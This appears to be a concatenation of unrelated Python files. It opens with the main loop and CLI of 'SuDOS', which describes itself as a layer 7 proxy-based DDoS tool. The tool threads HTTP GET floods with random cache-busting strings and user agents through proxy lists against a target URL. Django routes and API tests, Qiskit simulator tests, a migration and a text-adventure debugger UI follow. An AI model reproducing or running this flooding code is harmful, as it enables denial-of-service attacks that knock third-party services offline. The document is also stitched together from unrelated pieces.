parameters = url_dict["parameters"]
if proxy_host:
if not proxy_type:
print(f"sudos error: missing proxy type")
return
elif not proxy_port:
print(f"sudos error: missing proxy port")
return
try:
proxy_port = int(proxy_port)
except ValueError:
print(f"sudos error: unable to convert proxy port to integer")
return
if proxy_host:
sock = socks.socksocket()
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
connected = True
active_connections += 1
total_connected += 1
if protocol == "https":
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
if parameters:
parameters = f"&{parameters}"
else:
parameters = ""
while True:
if active_connections < connection_limit:
continue
anti_cache = rand_chars(77)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
up = sock.send(http.encode())
ups += up
total_ups += up
hrs += 1
total_hrs += 1
while True:
receive = sock.recv(1024)
download = len(receive)
dps += download
total_dps += download
if download < 1024:
break
time.sleep(delay)
except Exception as e:
#print(f"sudos error: {e}")
pass
finally:
active_threads -= 1
if connected:
active_connections -= 1
def clear_console():
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
def rand_chars(length):
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
chars_list = list(chars)
rand_text = random.choices(chars_list, k=length)
text = "".join(rand_text)
return text
def separate(separator_length, string):
separator = " " * separator_length
string = str(string)
return separator[len(string):]
def verbose():
try:
global hrs
global dps
global ups
while True:
print(f"Threads: {GREEN}{active_threads}{RESET} {separate(5, active_threads)} Connections: {GREEN}{active_connections}{RESET} {separate(5, active_connections)} HR/s: {GREEN}{hrs}{RESET} {separate(5, hrs)} D/s: {GREEN}{dps}{RESET} {separate(12, dps)} U/s {GREEN}{ups}{RESET}")
hrs = 0
dps = 0
ups = 0
time.sleep(1)
except Exception:
pass
def url_split(url):
try:
try:
protocol, url = url.split("://", 1)
except ValueError:
return
try:
domain, path = url.split("/", 1)
except ValueError:
domain = url
path = ""
try:
domain, port = domain.split(":", 1)
except ValueError:
if protocol == "https":
port = 443
else:
port = 80
port = int(port)
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = None
path = f"/{path}"
url_dict = {}
url_dict["protocol"] = protocol
url_dict["domain"] = domain
url_dict["port"] = port
url_dict["path"] = path
url_dict["parameters"] = parameters
return url_dict
except Exception:
return
def bytecount(bytesize):
total = f"{bytesize} B"
if bytesize >= 1000:
total = bytesize / 1000
total = f"{total:.2f} kB"
if bytesize >= 1000000:
total = bytesize / 1000000
total = f"{total:.2f} MB"
if bytesize >= 1000000000:
total = bytesize / 1000000000
total = f"{total:.2f} GB"
if bytesize >= 1000000000000:
total = bytesize / 1000000000000
total = f"{total:.2f} TB"
return total
def onexit():
attack_duration = time.time() - start_time
attack_duration = f"{attack_duration:.2f}"
total_download = bytecount(total_dps)
total_upload = bytecount(total_ups)
print(f"\r\nTotal Requests: {total_hrs}\r\nTotal Connected: {total_connected}\r\nTotal Download: {total_download}\r\nTotal Upload: {total_upload}\r\n\r\nAttack Duration: {attack_duration} seconds")
def main():
try:
global max_threads
global delay
global connection_limit
global start_time
parser = argparse.ArgumentParser(description="SuDOS, powerful layer 7 proxy-based DDoS tool.")
parser.add_argument("-t", "--threads", type=int, default=100, metavar="INT", help="Max thread count")
parser.add_argument("-z", "--proxy-type", choices=["http", "socks4", "socks5"], metavar="PROXYTYPE", help="Proxy list type")
parser.add_argument("-x", "--proxy-list", metavar="PROXYFILE", help="Proxy list file")
parser.add_argument("-c", "--timeout", type=int, default=5, metavar="TIMEOUT", help="Socket connection timeout")
parser.add_argument("-v", "--delay", type=int, default=1, metavar="DELAY", help="Timeout per HTTP request")
parser.add_argument("-b", "--connection-limit", type=int, metavar="INT", help="Connected socket count before flooding the target server")
parser.add_argument("url", nargs="?", metavar="URL", help="Target URL including protocol, domain and port for particular use")
args = parser.parse_args()
max_threads = args.threads
proxy_type = args.proxy_type
proxy_list = args.proxy_list
timeout = args.timeout
url = args.url
if not url:
print(f"ERROR: URL is required")
parser.print_usage()
sys.exit()
socket.setdefaulttimeout(timeout)
delay = args.delay
if args.connection_limit:
connection_limit = args.connection_limit
if not url_split(url):
print(f"ERROR: Invalid URL")
sys.exit()
if proxy_list:
if not proxy_type:
print(f"ERROR: Proxy type is missing")
sys.exit()
try:
proxy_list = open(proxy_list, "r")
proxies = proxy_list.readlines()
proxy_list.close()
except FileNotFoundError:
print(f"ERROR: Proxy list file not found")
sys.exit()
except Exception:
print(f"ERROR: Invalid proxy list file")
sys.exit()
proxy_type = proxy_type.upper()
proxy_type = getattr(socks, proxy_type)
atexit.register(onexit)
threading.Thread(target=verbose, daemon=True).start()
start_time = time.time()
clear_console()
if proxy_list:
while True:
for proxy in proxies:
proxy = proxy.strip()
try:
proxy_host, proxy_port = proxy.split(":")
except Exception:
continue
try:
proxy_port = int(proxy_port)
except Exception:
continue
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], kwargs={"proxy_type": proxy_type, "proxy_host": proxy_host, "proxy_port": proxy_port}, daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], daemon=True).start()
except KeyboardInterrupt:
sys.exit()
except Exception:
pass
if __name__ == "__main__":
main()
|
from django.conf.urls import patterns, url
from webui.views.dashboard import DashboardView
from webui.views.login import LoginView
from webui.views.logs import LogsView
urlpatterns = patterns(
'webui.views',
url(r'^$', DashboardView.as_view(), name='dashboard'),
url(r'^signin/$', LoginView.as_view(), name='signin'),
url(r'^signout/$', 'signout', name='signout'),
url(r'^sessions/$', 'session.session_list', name='session_list'),
url(r'^sessions/(?P<session_id>[\w-]+)$', 'session.session_details', name='session_details'),
url(r'^sessions/update/$', 'session.session_update', name='session_update'),
url(r'^sessions/new/$', 'session.session_new', name='session_new'),
url(r'^sessions/create/$', 'session.session_create', name='session_create'),
url(r'^sessions/(?P<session_id>[\w-]+)/execute$', 'session.session_execute', name='session_execute'),
url(r'^sessions/(?P<session_id>[\w-]+)/start', 'session.session_start', name='session_start'),
url(r'^sessions/(?P<session_id>[\w-]+)/stop', 'session.session_stop', name='session_stop'),
url(r'^sessions/(?P<session_id>[\w-]+)/executions/(?P<execution_id>[\w-]+)$', 'execution_details', name='execution_details'),
url(r'^testplans/$', 'testplan.testplan_list', name='testplan_list'),
url(r'^testplans/(?P<testplan_id>[\w-]+)$', 'testplan.testplan_details', name='testplan_details'),
url(r'^testplans/update/$', 'testplan.testplan_update', name='testplan_update'),
url(r'^testplans/new/$', 'testplan.testplan_new', name='testplan_new'),
url(r'^testplans/delete/$', 'testplan.testplan_delete', name='testplan_delete'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/(?P<rule_id>[\w-]+)$', 'rule.rule_details', name='rule_details'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/(?P<rule_id>[\w-]+)/update$', 'rule.rule_update', name='rule_update'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/new/$', 'rule.rule_new', name='rule_new'),
url(r'^qos/$', 'qos.qos_list', name='qos_list'),
url(r'^qos/(?P<qos_id>[\w-]+)$', 'qos.qos_details', name='qos_details'),
url(r'^qos/update/$', 'qos.qos_update', name='qos_update'),
url(r'^qos/new/$', 'qos.qos_new', name='qos_new'),
url(r'^qos/delete/$', 'qos.qos_delete', name='qos_delete'),
url(r'^serveroverload/$', 'serveroverload.serveroverload_list', name='serveroverload_list'),
url(r'^serveroverload/(?P<serveroverload_id>[\w-]+)$', 'serveroverload.serveroverload_details', name='serveroverload_details'),
url(r'^serveroverload/update/$', 'serveroverload.serveroverload_update', name='serveroverload_update'),
url(r'^serveroverload/new/$', 'serveroverload.serveroverload_new', name='serveroverload_new'),
url(r'^serveroverload/delete/$', 'serveroverload.serveroverload_delete', name='serveroverload_delete'),
url(r'^recordings/$', 'recording.recording_list', name='recording_list'),
url(r'^recordings/(?P<recording_id>[\w-]+)$', 'recording.recording_details', name='recording_details'),
url(r'^recordings/(?P<recording_id>[\w-]+)/live$', 'recording.recording_live', name='recording_live'),
url(r'^recordings/(?P<recording_id>[\w-]+)/start$', 'recording.recording_start', name='recording_start'),
url(r'^recordings/(?P<recording_id>[\w-]+)/stop$', 'recording.recording_stop', name='recording_stop'),
url(r'^recordings/update/$', 'recording.recording_update', name='recording_update'),
url(r'^recordings/new/$', 'recording.recording_new', name='recording_new'),
url(r'^ajax/traffic/$', 'ajax_traffic', name='ajax_traffic'),
url(r'^logs/$', LogsView.as_view(), name='logs'),
url(r'^settings/$', 'settings_view', name='settings'),
)
|
from rest_framework.test import APIClient, APITestCase
from rest_framework import status
from django.contrib import auth
from django.contrib.auth.models import Group
from contest.models import Contest, Task, TestCase
import datetime
class TaskTestCase(APITestCase):
@classmethod
def setUpTestData(cls):
verified_users_group = Group.objects.create(name='Verified Users')
contest = Contest.objects.create(
title='TestTitle1',
description='TestDescription1',
start_time=datetime.datetime.now(),
duration=datetime.timedelta(hours=2),
)
Contest.objects.create(
title='TestTitle2',
description='TestDescription2',
start_time=datetime.datetime.now(),
duration=datetime.timedelta(hours=2),
)
past_contest = Contest.objects.create(
title='Past Contest',
description='Past Contest',
start_time=datetime.datetime.now() - datetime.timedelta(hours=2),
duration=datetime.timedelta(hours=1),
)
future_contest = Contest.objects.create(
title='Future Contest',
description='Future Contest',
start_time=datetime.datetime.now() + datetime.timedelta(hours=2),
duration=datetime.timedelta(hours=1),
)
Task.objects.create(
title='TestTitle1',
content='TestContent1',
contest=contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='TestTitle2',
content='TestContent2',
contest=contest,
ml=512,
tl=5,
_order=1,
)
Task.objects.create(
title='TestTitle3',
content='TestContent3',
contest=contest,
ml=512,
tl=5,
_order=2,
)
Task.objects.create(
title='PastTitle',
content='PastContent',
contest=past_contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='FutureTitle1',
content='FutureContent1',
contest=future_contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='FutureTitle2',
content='FutureContent2',
contest=future_contest,
ml=512,
tl=5,
_order=1,
)
cls.user = auth.get_user_model().objects.create(
username='TestUsername',
email='TestEmail',
)
cls.user.set_password('TestPassword')
cls.user.text_password = 'TestPassword'
cls.user.groups.add(verified_users_group)
cls.user.save()
cls.admin = auth.get_user_model().objects.create(
username='TestAdminUsername',
email='TestAdminEmail',
is_staff=True,
)
cls.admin.set_password('TestAdminPassword')
cls.admin.text_password = 'TestAdminPassword'
cls.admin.groups.add(verified_users_group)
cls.admin.save()
cls.result_keys = ('id', 'title', 'content', 'contest', 'tl', 'ml', 'samples')
@staticmethod
def authorize(user):
sign_in_data = {
'username': user.username,
'password': user.text_password,
}
client = APIClient()
response = client.post('/api/token-auth', data=sign_in_data, format='json')
token = response.data['token']
client.credentials(HTTP_AUTHORIZATION='JWT ' + token)
return client
def test_unauthorized_head(self):
client = APIClient()
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_authorized_head(self):
client = self.authorize(self.user)
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_admin_head(self):
client = self.authorize(self.admin)
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_unauthorized_list(self):
client = APIClient()
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_authorized_list(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_admin_list(self):
        client = self.authorize(self.admin)
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_list_filter(self):
client = APIClient()
response = client.get('/api/tasks/?title=TestTitle1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 1)
def test_list_search(self):
client = APIClient()
response = client.get('/api/tasks/?search=Content1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 2)
def test_unauthorized_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
}
client = APIClient()
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authorized_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
}
client = self.authorize(self.user)
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
'_order': 3,
'test_cases': [
{
'input': '0 0',
'output': '0',
},
{
'input': '0 1',
'output': '1',
},
{
'input': '1 1',
'output': '1',
}
]
}
client = self.authorize(self.admin)
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Task.objects.count(), 7)
self.assertEqual(Task.objects.get(id=7).title, 'NewTestTitle')
self.assertEqual(Task.objects.get(id=7).content, 'NewTestContent')
self.assertEqual(Task.objects.get(id=7).contest, Contest.objects.get(id=1))
self.assertEqual(Task.objects.get(id=7).ml, 2**28)
self.assertEqual(Task.objects.get(id=7).tl, 2)
def test_unauthorized_retrieve(self):
client = APIClient()
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_authorized_retrieve(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_admin_retrieve(self):
        client = self.authorize(self.admin)
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_non_existent_retrieve(self):
client = APIClient()
response = client.get('/api/tasks/0/')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_unauthorized_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = APIClient()
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
def test_authorized_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = self.authorize(self.user)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
def test_admin_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = self.authorize(self.admin)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_admin_partial_wrong_contest_update(self):
updates = {
'contest': 0,
}
client = self.authorize(self.admin)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertNotEqual(Task.objects.get(id=1).contest.id, 0)
def test_unauthorized_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
}
client = APIClient()
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertNotEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertNotEqual(Task.objects.get(id=1).contest.id, 2)
def test_authorized_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
}
client = self.authorize(self.user)
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertNotEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertNotEqual(Task.objects.get(id=1).contest.id, 2)
def test_admin_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
'_order': 0,
}
client = self.authorize(self.admin)
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(response.data)
self.assertEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertEqual(Task.objects.get(id=1).contest.id, 2)
def test_unauthorized_destroy(self):
client = APIClient()
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authorized_destroy(self):
client = self.authorize(self.user)
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_destroy(self):
client = self.authorize(self.admin)
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_common_options(self):
allowed_headers = ('Allow', 'GET, POST, HEAD, OPTIONS')
client = APIClient()
response = client.options('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response._headers['allow'], allowed_headers)
def test_detail_options(self):
allowed_headers = ('Allow', 'GET, PUT, PATCH, DELETE, HEAD, OPTIONS')
client = APIClient()
response = client.options('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response._headers['allow'], allowed_headers)
|
# -*- coding: utf-8 -*-
# Copyright 2019, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""
QasmSimulator Integration Tests
"""
import multiprocessing
from test.terra.utils import common
from test.terra.utils import ref_qvolume
from qiskit import compile
from qiskit.providers.aer import QasmSimulator
class QasmThreadManagementTests(common.QiskitAerTestCase):
"""QasmSimulator thread tests."""
SIMULATOR = QasmSimulator()
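    # The three tests below exercise complementary thread splits reported in the
    # result metadata: by default the threads go to parallel_state_update, with
    # max_parallel_shots they go to parallel_shots, and with
    # max_parallel_experiments they go to parallel_experiments.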
def test_qasm_default_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = 100
circuit = ref_qvolume.quantum_volume(4, final_measure=True)
qobj = compile(circuit, self.SIMULATOR, shots=shots)
backend_opts = {}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], 1, msg="default parallel_experiments should be 1")
self.assertEqual(result.metadata['parallel_shots'], 1, msg="default parallel_shots should be 1")
self.assertEqual(result.metadata['parallel_state_update'], multiprocessing.cpu_count(), msg="default parallel_state_update should be same with multiprocessing.cpu_count()")
def test_qasm_shot_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = multiprocessing.cpu_count()
circuit = ref_qvolume.quantum_volume(4, final_measure=True)
qobj = compile(circuit, self.SIMULATOR, shots=shots)
backend_opts = {'max_parallel_shots': shots}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], 1, msg="default parallel_experiments should be 1")
self.assertEqual(result.metadata['parallel_shots'], multiprocessing.cpu_count(), msg="parallel_shots must be multiprocessing.cpu_count()")
self.assertEqual(result.metadata['parallel_state_update'], 1, msg="parallel_state_update should be 1")
def test_qasm_experiments_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = 100
experiments = multiprocessing.cpu_count()
circuits = []
for i in range(experiments):
circuits.append(ref_qvolume.quantum_volume(4, final_measure=True))
qobj = compile(circuits, self.SIMULATOR, shots=shots)
backend_opts = {'max_parallel_experiments': experiments}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], multiprocessing.cpu_count(), msg="parallel_experiments should be multiprocessing.cpu_count()")
self.assertEqual(result.metadata['parallel_shots'], 1, msg="parallel_shots must be 1")
self.assertEqual(result.metadata['parallel_state_update'], 1, msg="parallel_state_update should be 1")
|
# Generated by Django 2.2.4 on 2019-10-15 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crud_lugar', '0004_auto_20191015_1501'),
]
operations = [
migrations.AlterField(
model_name='evento',
name='hora_fin',
field=models.TimeField(null=True),
),
migrations.AlterField(
model_name='evento',
name='hora_ini',
field=models.TimeField(null=True),
),
migrations.AlterField(
model_name='foto',
name='ruta',
field=models.FileField(null=True, upload_to='myfolder/'),
),
]
|
import sys
import os
import datetime
import pickle
import textwrap
from prompt_toolkit import Application
from prompt_toolkit.layout.containers import VSplit, HSplit, Window
from prompt_toolkit.layout.controls import BufferControl, FormattedTextControl
from prompt_toolkit.layout.margins import ScrollbarMargin
from prompt_toolkit.buffer import Buffer, reshape_text
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.layout import Dimension, ScrollOffsets
from prompt_toolkit.widgets import Label, TextArea, Box
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout.processors import TabsProcessor
from prompt_toolkit.key_binding.bindings.scroll import (
scroll_backward,
scroll_forward,
scroll_half_page_down,
scroll_half_page_up,
scroll_one_line_down,
scroll_one_line_up,
scroll_page_down,
scroll_page_up,
)
import datafiles
import machine
shortcuts = {
"n" : "north",
"s" : "south",
"e" : "east",
"w" : "west",
"u" : "up",
"d" : "down",
"i" : "inv",
"l" : "look"
}
def help():
output = [
"All of this might break things.",
"-------------------------------------",
"\\save <name>: saves game to ",
" ./saves/<name>.bin",
"\\load <name>: loads game from ",
" ./saves/<name>.bin",
"\\mon: toggles memory monitoring",
"\\wmem <loc> <val>: writes memory",
"\\rmem <start> <end>: reads memory",
"\\dreg: dumps all register values",
"\\sreg <reg> <val>: sets a register",
"\\warp <loc>: warps around the world",
"\\dis <n>: disassemble the next <n>",
" instructions to a file",
" at ./disassembly.txt",
"\\disp <n>: disassemble and pause"
" at the end of it",
]
debug_text.buffer.text = "\n".join(output)
def save(fname):
if not os.path.exists("./saves"):
os.mkdir("./saves")
fpath = os.path.join("./saves", fname)
debug_text.buffer.text = f"Saving to {fpath}..."
with open(fpath, "wb") as save_file:
computer.core_dump(save_file)
def load(fname):
fpath = os.path.join("./saves", fname)
if not os.path.exists(fpath):
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: No such file.", 35))
return
debug_text.buffer.text = f"Loading from {fpath}..."
with open(fpath, "rb") as save_file:
computer.load_core_dump(save_file)
memory_monitor = False
def mon():
global memory_monitor
memory_monitor = not memory_monitor
def wmem(loc, val):
if (not loc.isdigit()) or (not val.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations and values must be 15-bit uints", 35))
return
loc = int(loc)
val = int(val)
    if loc < 0 or val < 0 or loc > 32767 or val > 32767:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations and values must be 15-bit uints.", 35))
return
computer.mem[loc] = val
rmem(str(loc))
def rmem(start, stop=None):
    if stop is None:
stop = start
if (not start.isdigit()) or (not stop.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations must be 15-bit uints", 35))
return
start = int(start)
stop = int(stop)
    if start < 0 or stop < 0 or start > 32767 or stop > 32767:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations must be 15-bit uints", 35))
return
if stop < start:
start, stop = stop, start
out = ""
while start <= stop:
out += f"{start}: {computer.mem[start]}\n"
start += 1
debug_text.buffer.text = out
def dreg():
out = "registers:\n"
for i, r in enumerate(computer.registers):
out += f"\t{i}:\t{r}\n"
debug_text.buffer.text = out
def sreg(reg, val):
if (not reg.isdigit()) or (not val.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Register indices and values must be integers", 35))
return
reg = int(reg)
val = int(val)
if reg < 0 or reg >= len(computer.registers):
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: Invalid register index.", 35))
return
    if val < 0 or val > 32767:
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: Registers hold 15-bit uints.", 35))
return
computer.registers[reg] = val
dreg()
def warp(loc_idx):
if not loc_idx.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Warp locations must be integers", 35))
return
loc_idx = int(loc_idx)
computer.mem[2732] = loc_idx
computer.mem[2733] = loc_idx
# disassemble the next N instructions
def dis(count):
if not count.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Disassembly count must be integer", 35))
return
count = int(count)
computer.dissassembly_count = count
# disassemble the next N instructions and then pause
def disp(count):
if not count.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Disassembly count must be integer", 35))
return
count = int(count)
computer.dissassembly_count = count
computer.ticks = count
def pre_parse(cmd):
parts = cmd.split(" ")
if cmd.startswith("\\"):
f = globals().get(parts[0][1:], None)
if f:
f(*parts[1:])
return None
else:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: No such command '{parts[0]}'", 35))
return None
if parts[0] in shortcuts.keys():
parts[0] = shortcuts[parts[0]]
cmd = " ".join(parts)
if not cmd.endswith("\n"):
cmd += "\n"
return cmd
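# Quick illustration of pre_parse() behaviour (values taken from the code above):
# pre_parse("n") expands the shortcut and returns "north\n", while a backslash
# command such as "\dreg" is dispatched to the dreg() meta command and returns None.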
raw_output = ""
class UIPrinter:
def __init__(self, target: Buffer, win: Window):
self.target = target
self.win = win
def accept_output(self, val):
global raw_output
raw_output += chr(val)
self.target.text += chr(val)
self.target.cursor_position = len(self.target.text)
def diff_mem(mem1, mem2):
diffs = []
if len(mem1) != len(mem2):
print(f"WARNING: Memory not the same size. ({len(mem1)} vs {len(mem2)}) Diffs will be null.")
return diffs
for mi in range(len(mem1)):
if mem1[mi] == mem2[mi]:
continue
diffs.append((mi, mem1[mi], mem2[mi]))
return diffs
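# For example, diff_mem([1, 2, 3], [1, 5, 3]) returns [(1, 2, 5)]:
# (address, old value, new value) for every cell that changed.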
def format_diffs(hist, idx1, idx2, regs=False, mem=True):
out = ""
m1 = hist[idx1]
m2 = hist[idx2]
reg_diffs = diff_mem(m1["registers"], m2["registers"])
mem_diffs = diff_mem(m1["memory"], m2["memory"])
out += f"'{m2['history'][-1]}' changes:\n"
if regs:
if len(reg_diffs) == 0:
out += "\tregisters: [none]\n"
else:
out += "\tregisters:\n"
for rd in reg_diffs:
out += f"\t\t{rd[0]}: {rd[1]}\t->\t{rd[2]}\n"
if mem:
if len(mem_diffs) == 0:
out += "\tmemory: [none]\n"
else:
out += "\tmemory:\n"
for md in mem_diffs:
out += f"\t\t{md[0]}: {md[1]}\t->\t{md[2]}"
if md[2] >= 32 and md[2] < 127:
out += f"\t({chr(md[2])})"
out += "\n"
return out
def wrap_output():
_, width = os.popen("stty size", "r").read().split()
width = int(width) - 43
formed = ["\n".join(textwrap.wrap(l, width)) for l in raw_output.splitlines()]
output_buffer.text = "\n".join(formed)
def inp_handler(buff):
global raw_output
if not buff.text.startswith("\\"):
raw_output += f"> {buff.text}\n\n"
output_buffer.text += f"> {buff.text}\n\n"
inp = pre_parse(buff.text)
if inp:
cmd_history.append(inp.strip())
computer.input_buffer = inp
computer.run()
wrap_output()
state_stack.append({
"history": cmd_history.copy(),
"registers": computer.registers.copy(),
"memory": computer.mem.copy()
})
if memory_monitor:
fdiffs = format_diffs(state_stack, -2, -1)
debug_text.buffer.text = fdiffs
if not computer.waiting_for_input:
output_buffer.text += "\n\n[Game exited]\n"
output_buffer.cursor_position = len(output_buffer.text)
output_buffer = Buffer("")
output_window = Window(
BufferControl(buffer=output_buffer, input_processors=[]),
wrap_lines=True,
right_margins=[ScrollbarMargin()],
always_hide_cursor=True,
allow_scroll_beyond_bottom=True,
)
prompt_history = InMemoryHistory()
input_prompt = TextArea("", multiline=False, height=Dimension(max=1), history=prompt_history, accept_handler=inp_handler, prompt="> ")
debug_text = BufferControl(Buffer(""), input_processors=[TabsProcessor(char1=" ", char2=" ")])
root = VSplit(
[
HSplit(
[
output_window,
input_prompt
],
padding_char="-", padding=1,
),
Box(body=Window(content=debug_text, wrap_lines=True), width=Dimension(min=40, max=40), padding_left=1, padding_top=0, padding_bottom=0, padding_right=1),
],
padding_char="‖", padding=1
)
root_layout = Layout(root)
kb = KeyBindings()
@kb.add('c-d')
def exit_(event):
event.app.exit()
@kb.add('c-w')
def output_up_(event):
root_layout.focus(output_buffer)
scroll_half_page_up(event)
root_layout.focus(input_prompt)
@kb.add('c-s')
def output_down_(event):
root_layout.focus(output_buffer)
scroll_half_page_down(event)
